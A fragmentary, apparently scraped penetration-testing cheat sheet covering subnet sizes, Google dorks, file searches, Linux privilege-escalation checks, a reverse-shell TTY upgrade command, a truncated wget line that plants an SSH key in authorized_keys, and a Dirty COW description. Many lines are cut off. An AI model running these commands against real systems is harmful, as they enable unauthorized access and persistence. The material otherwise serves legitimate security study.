Subnet Reference Table
/ Addresses Hosts Netmask Amount of a Class C
/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 51...
Google search to find website sub domains
Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf
Google Hacking Database:
Set the Target IP Address to the $ip system variable
Find the location of a file
Search through directories in the $PATH environment variable
Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*
Show active int...
Scripts to run
The following script runs exploit suggester and automatically downloads and executes suggested exploits:
Linux elevation of privileges, manual testing
Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo), miss-configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.
First try simple sudo:
$ sudo su -
What can we run with sudo?
$ sudo -l
Try su as all users ...
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Add public key to authorized keys:
$ echo $(wget https://A...
Why is it called the Dirty COW bug?
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the ...